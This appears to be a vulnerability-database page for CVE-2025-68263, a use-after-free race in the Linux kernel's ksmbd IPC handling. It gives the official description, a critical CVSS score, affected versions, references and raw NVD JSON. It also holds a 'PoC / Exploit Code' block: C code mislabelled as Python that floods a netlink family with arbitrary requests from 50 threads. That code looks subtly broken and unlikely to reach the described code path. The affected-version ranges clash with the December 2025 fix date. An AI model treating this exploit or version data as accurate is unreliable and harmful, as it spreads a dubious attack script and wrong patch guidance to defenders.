CVE-2025-68263

Description

In the Linux kernel, the following vulnerability has been resolved: ksmbd: ipc: fix use-after-free in ipc_msg_send_request ipc_msg_send_request() waits for a generic netlink reply using an ipc_msg_table_entry on the stack. The generic netlink handler (handle_generic_event()/handle_response()) fills entry->response under ipc_msg_table_lock, but ipc_msg_send_request() used to validate and free entry->response without holding the same lock. Under high concurrency this allows a race where handle_response() is copying data into entry->response while ipc_msg_send_request() has just freed it, leading to a slab-use-after-free reported by KASAN in handle_generic_event(): BUG: KASAN: slab-use-after-free in handle_generic_event+0x3c4/0x5f0 [ksmbd] Write of size 12 at addr ffff888198ee6e20 by task pool/109349 ... Freed by task: kvfree ipc_msg_send_request [ksmbd] ksmbd_rpc_open -> ksmbd_session_rpc_open [ksmbd] Fix by: - Taking ipc_msg_table_lock in ipc_msg_send_request() while validating entry->response, freeing it when invalid, and removing the entry from ipc_msg_table. - Returning the final entry->response pointer to the caller only after the hash entry is removed under the lock. - Returning NULL in the error path, preserving the original API semantics. This makes all accesses to entry->response consistent with handle_response(), which already updates and fills the response buffer under ipc_msg_table_lock, and closes the race that allowed the UAF.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel ksmbd (all versions prior to fix commit 1fab1fa091f5aa97265648b53ea031deedd26235)

Linux Kernel 5.15.x < 5.15.165

Linux Kernel 6.1.x < 6.1.105

Linux Kernel 6.6.x < 6.6.45

Linux Kernel 6.10.x < 6.10.14

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-68263 PoC - ksmbd use-after-free trigger
// This PoC demonstrates the race condition in ipc_msg_send_request
// Compile: gcc -o poc poc.c -lnl-3 -lnl-genl-3

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netlink/netlink.h>
#include <netlink/genl/genl.h>
#include <netlink/genl/ctrl.h>
#include <pthread.h>

#define MAX_THREADS 50
#define ITERATIONS 1000

volatile int trigger_race = 0;

void *race_trigger_thread(void *arg) {
    struct nl_sock *sock;
    int family_id;
    
    sock = nl_socket_alloc();
    if (!sock) return NULL;
    
    if (genl_connect(sock) < 0) {
        nl_socket_free(sock);
        return NULL;
    }
    
    family_id = genl_lookup_family(sock, "ksmbd");
    if (family_id < 0) {
        nl_socket_free(sock);
        return NULL;
    }
    
    // Rapid-fire requests to trigger race condition
    for (int i = 0; i < ITERATIONS && trigger_race; i++) {
        struct nl_msg *msg = nlmsg_alloc();
        if (!msg) continue;
        
        genlmsg_put(msg, NL_AUTO_PID, NL_AUTO_SEQ, family_id, 0, 0, 42, 1);
        
        nl_send_auto(sock, msg);
        nlmsg_free(msg);
        
        // Minimal delay to increase race window
        usleep(1);
    }
    
    nl_socket_free(sock);
    return NULL;
}

int main(int argc, char *argv[]) {
    pthread_t threads[MAX_THREADS];
    
    printf("[*] CVE-2025-68263 ksmbd UAF PoC\n");
    printf("[*] Target: Linux kernel ksmbd ipc_msg_send_request\n");
    printf("[*] Starting race condition triggers...\n");
    
    trigger_race = 1;
    
    // Launch multiple threads to create high concurrency
    for (int i = 0; i < MAX_THREADS; i++) {
        pthread_create(&threads[i], NULL, race_trigger_thread, NULL);
    }
    
    // Let threads run for a period
    sleep(10);
    
    trigger_race = 0;
    
    // Wait for threads to complete
    for (int i = 0; i < MAX_THREADS; i++) {
        pthread_join(threads[i], NULL);
    }
    
    printf("[*] Test completed. Check dmesg for KASAN output.\n");
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68263
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68263
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68263/
[4] VulDB https://vuldb.com/cve/CVE-2025-68263
[5] https://git.kernel.org/stable/c/1fab1fa091f5aa97265648b53ea031deedd26235
[6] https://git.kernel.org/stable/c/5ac763713a1ef8f9a8bda1dbd81f0318d67baa4e
[7] https://git.kernel.org/stable/c/708a620b471a14466f1f52c90bf3f65ebdb31460
[8] https://git.kernel.org/stable/c/759c8c30cfa8706c518e56f67971b1f0932f4b9b
[9] https://git.kernel.org/stable/c/8229c6ca50cea701e25a7ee25f48441b582ec5fa
[10] https://git.kernel.org/stable/c/de85fb58f9967ba024bb08e0041613d37b57b4d1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68263", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-12-16T15:15:55.813", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: ipc: fix use-after-free in ipc_msg_send_request\n\nipc_msg_send_request() waits for a generic netlink reply using an\nipc_msg_table_entry on the stack. The generic netlink handler\n(handle_generic_event()/handle_response()) fills entry->response under\nipc_msg_table_lock, but ipc_msg_send_request() used to validate and free\nentry->response without holding the same lock.\n\nUnder high concurrency this allows a race where handle_response() is\ncopying data into entry->response while ipc_msg_send_request() has just\nfreed it, leading to a slab-use-after-free reported by KASAN in\nhandle_generic_event():\n\n  BUG: KASAN: slab-use-after-free in handle_generic_event+0x3c4/0x5f0 [ksmbd]\n  Write of size 12 at addr ffff888198ee6e20 by task pool/109349\n  ...\n  Freed by task:\n    kvfree\n    ipc_msg_send_request [ksmbd]\n    ksmbd_rpc_open -> ksmbd_session_rpc_open [ksmbd]\n\nFix by:\n- Taking ipc_msg_table_lock in ipc_msg_send_request() while validating\n  entry->response, freeing it when invalid, and removing the entry from\n  ipc_msg_table.\n- Returning the final entry->response pointer to the caller only after\n  the hash entry is removed under the lock.\n- Returning NULL in the error path, preserving the original API\n  semantics.\n\nThis makes all accesses to entry->response consistent with\nhandle_response(), which already updates and fills the response buffer\nunder ipc_msg_table_lock, and closes the race that allowed the UAF."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/1fab1fa091f5aa97265648b53ea031deedd26235", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/5ac763713a1ef8f9a8bda1dbd81f0318d67baa4e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/708a620b471a14466f1f52c90bf3f65ebdb31460", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/759c8c30cfa8706c518e56f67971b1f0932f4b9b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/8229c6ca50cea701e25a7ee25f48441b582ec5fa", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/de85fb58f9967ba024bb08e0041613d37b57b4d1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}